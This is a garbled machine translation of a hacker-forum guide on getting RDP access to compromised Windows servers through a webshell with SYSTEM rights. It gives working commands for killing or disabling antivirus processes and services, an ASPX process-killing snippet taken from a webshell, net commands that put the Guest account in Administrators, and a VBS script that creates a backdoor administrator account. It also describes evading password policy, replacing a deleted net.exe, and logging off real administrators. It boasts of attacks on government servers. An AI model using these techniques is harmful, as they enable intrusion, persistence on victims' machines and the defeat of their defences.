Windows Server System permissions Webshell Unable to add 3389 account situation breakout Summary

Transferred from: http://bbs.blackbap.org/thread-2331-1-1.html

Nearly a lot of silic friends add accounts under the system permissions under Windows Webshell, but they don't succeed. System permissions, permissions are enough, but not successful, why?
There are many reasons, so I summed up the cause, and in the following article is analyzed, and then attached a bit of personal breakthrough bypass method. The right to mention can not be hundred percent successful, I just summed up some common situation, the other I will slowly add
Yoco Smart
From: Silic Group Hacker Army
http://blackbap.org
Webshell has system permissions but cannot successfully add the Administrators user, resulting in an unsuccessful connection of 3389. The reasons are summarized as follows:
I. Killing Soft articles
1,anti-virus software
2, mccafés anti-virus software
3, Kaspersky Anti-virus software
4, other anti-virus software or protection software
II. Strategy Chapter
1,3389 Port Changes
2, inexplicable unable to add account
3, Administrator limit Chapter
4, the system has reached the maximum number of connections processing

-----------------------I Kill the soft article-----------------------------
1,anti-virus software
Often in the domestic some servers encountered antivirus and protection software, if you use Webshell to add Administrators account, will block and prompt the administrator, resulting in the addition failed.
So how do you break the limit? is not a perfect support server system, that is, actually very simple.
Block Webshell Add account is mainly active defense, and end the active defense, antivirus is the device.
That day preface to Baidu search blackbap.org This key word, incredibly appeared in forum, originally is Silic developed PHP big Horse by a server administrator reported to forum up.
Basically this is the network management to Webshell, said do not check out, hope to update the virus database and so on, the results engineers see later said update can be killed, the result of network management said update or kill. Then the engineer said what to install what, network Management said installed, or can not kill, and then the engineer Little Puss Turtle. Visible on the server is very rubbish, with a small white words is, please take the money with the fight to spend more on research and development products.
All right, rip it off, the breakthrough method is awaited.
Execute tasklist First, look at the list of processes, and then

1. Taskkill/im process name. exe/f

Copy Code

End the active defense.
related processes are as follows:
this several out, basically of the obstruction to clear, the addition account plus account, the PR on the PR.
Windows under the particularity of apache+php, resulting in a lot of PHP station Webshell have system permissions, so the end of is a breeze.
Even if it is not system, there are ways, such as aspx,asp.net has a function of manipulating the process. Look at the code (pulled directly from the Webshell):

1. protected void Kp_click (object sender, EventArgs e)
   
2. {
   
3. process[] kp = process.getprocesses ();
   
4. foreach (Process kp1 in KP)
   
5. if (KP1. ProcessName = = ListBox1.SelectedValue.ToString ())
   
6. {
   
7. Try
   
8. {
   
9. Kp1. Kill ();
   
10. Response.Write ("<script>alert (' killed '); location.href= '?" </"+" script> ");
    
11. ListBox1.Items.Clear ();
    
12. 
    
13. }
    
14. catch (Exception x)
    
15. {
    
16. Response.Write (X.message.tostring ());
    
17. Response.End ();
    
18. }
    
19. }
    
20. }

Copy Code

This kill () function of the ASP. Iis+aspx can easily kill even if the users user group is in the.
Some Sysytem permissions can not be done, such as the first query user to see the administrator status, because it is likely that the administrator logged on after the graphical interface is not closed, the system does not perform Taskkill
So logoff kicked the admin, and then some processes on their own, which is more than 2008 of the server system now

2, mccafés anti-virus software
Previously talked about how to bypass mccafés antivirus software to get 3389 landing rights of the article.
The original article is here: http://bbs.blackbap.org/thread-2085-1-1.html
The complete process is to enable the Guest account, modify the guest user's password, and add the guest to the Administrators user group.
After testing, the Mccafés protection process is probably a breakthrough, so the cmd command is as follows:

1. NET user Guest/active:yes//enable the Guest user
   
2. NET user Guest silic!&11133//Modify guest Password
   
3. net localgroup Administrators Guest/add//Add guest to the Administrators user group

Copy Code

The second or third of these three commands may sometimes not show that the command is successful, but in practice it should be possible to execute successfully if it is a system permission, and it is not important to have the echo.

3, Kaspersky
Protection for Kaspersky is also a headache. There are a lot of ways to break Kaspersky.
Adjust the system time, let Kabbah's key expire, this will not say. There are also mkdir created with illegal characters "." Named folder, the PR, such as the right to transfer the program in. The
system is not easy to add users directly to the defenses of Kabbah, but you can try to end the process and add the account by using the Taskkill & net User add command that ends the process.
This method has not yet been practiced, but it is theoretically possible, because Kabbah is not like mccafés, it can be terminated directly, but it will restart the process immediately.

4, kingsoft protection software
First said KSafeSvc.exe, at that time do not know what the thing, from the file name should be a golden hill of things.
This process is not even taskkill ... As long as there is it, net user/add, even if Net.exe renamed, it will also pop up whether to block the window (maybe it plays, even if it does not play, but also to kill him to add)
But there is a command called NTSD, can terminate most of the process, For example Winlogon.exe Svchost.exe these:
then the ntsd-c q-p PID end KSafeSvc.exe
then say: Jinshan poison PA + jinshan Guardian + Rising firewall combination
This combination looks very good, in fact, very silly force. Today met a system of PHP, above is Jinshan poison PA + jinshan Guardian + Rising firewall combination
You can save the following code to C:\windows\temp\a.vbs

1. Set Wsnetwork=createobject ("Wscript.Network")
   
2. os= "winnt://" &wsnetwork.computername
   
3. Set ob=getobject (OS)
   
4. Set oe=getobject (os& "/administrators,group")
   
5. Set Od=ob. Create ("User", "Silic")
   
6. Od. SetPassword "Silic"
   
7. Od. SetInfo
   
8. Set of=getobject (os& "/silic", user)
   
9. Oe.add os& "/silic"

Copy Code

Then execute with the following command, you can get the account is Silic password for silic Administrator account:

1. cscript C:\windows\temp\a.vbs

Copy Code

5, disable the service method

1. sc config service name start= disabled

Copy Code

Sometimes MySQL or MSSQL and so on power, there will be a killing soft can not be ended, resulting in the failure of the right to raise the situation.
We have to kill the soft service is set to disable, restart the server, antivirus protection services will not be able to run. It is unobstructed, for example:

1. sc config msmpsvc start= disabled

Copy Code

5, other protection software
Seen a lot of non-mainstream protection software, what security shield Ah, Safe3 anti-tamper Ah, there are a variety of similar programs, specific names I forgot.
The breakthrough methods of these software and mainstream protection software breakthrough methods are roughly the same, end the process, or do not use the Add account, directly enable the existing guest to break through the monitoring, do not repeat the
Another way to do this is to change the protection software service from auto-start to not start, and then restart the server. This method is effective for most servers.

--------------------------------II, Strategy chapter-----------------------------
1,3389 Port Changes
Before you make 3389 add an account, first know that 3389 is turned on.
There are currently only 3389 port change examples, and I have not seen an example of not opening 3389. So why are some of the nets 3389 not even up?
The reason is simple, 3389 port changed the chant. It's a simple way to find out. Netstat-an View all open ports.
A suspicious end of the oral examination is too bad. Netstat-ano view the port and process PID using the port, and then tasklist see which Svchost.exe process PID uses the port
Note that it is one of the Svchost.exe.

2, inexplicable wonderful Unable to add account
What is inexplicable wonder? Some hosts, Webshell is the system permissions, Tasklist also see no protection of the process, the administrator is not online, the right to add the program can not, how to do?
Because there must be fruit, such a situation can not be added, most of the system has a Group policy restrictions, usually limited to the minimum password length. And this group strategy is mostly mccafés and other protection software settings. Or simply the installed system itself is gho on this setting.
Breakthrough method Needless to say, the number of passwords set a bit longer OK, the original password is 123456, and now [email protected]#$ on the past
If it is still not added, you can try to add it with a VBS script.

3, Administrator restrictions
Some BT administrators are very hateful, directly to the c:\windows\system32 of the Net.exe to delete or change, so you direct net when you will be prompted to deny access or not system commands and so on similar hints.
The administrator seems to be very cow B, in fact, very silly, the system net.exe, you pass a own net.exe on the breakthrough.
Of course, there are 64 of the system and your program is incompatible with the situation occurs, he is 64 you will pass 64 bit, very good engage.

4, maximum connection limit reached
Sometimes the account is added, but the connection indicates the maximum number of connections. The administrator is not on the line, but the line does not let you go up, such as the administrator himself on-line, and then delete you. This kind of administrator is wicked.
For this kind of not go, first query user to view the online account, and then see his login ID, usually 0, up to 8, more than 8 description of the server has not restarted for a long time (this is not allowed)
Then logoff ID, the corresponding ID of the administrator kicked off. Then you can log in.
Of course you don't logoff yourself when you're logoff, and it's better not to kick people during the day. If the administrator is kicked out online, you know. — —！
2011 and Vietnam Black-wide engage in offensive and defensive, our site people on the people of Vietnam's gov server, and then ... Our website of the black-and-daisy chat room, the administrator of the deletion, delete, our website logoff the administrator's account, and then disable and administrator ... Later, the Administrator on the eyes of everyone in the Chrysanthemum chat room chat, and then ran for half an hour to the computer room to unplug the network cable ... The logoff command is really maliciousness, especially for some servers that are not on the local site ...

Supplement：
Some Sysytem permissions but not, you can first query user to see the administrator status
It is likely that the administrator logged in after running the graphical interface is not closed, the system does not perform Taskkill
So logoff kicked the manager, and then of the processes went out on their own.
On server systems that are 2008 more

Windows Server System permissions Webshell Unable to add 3389 account situation breakout Summary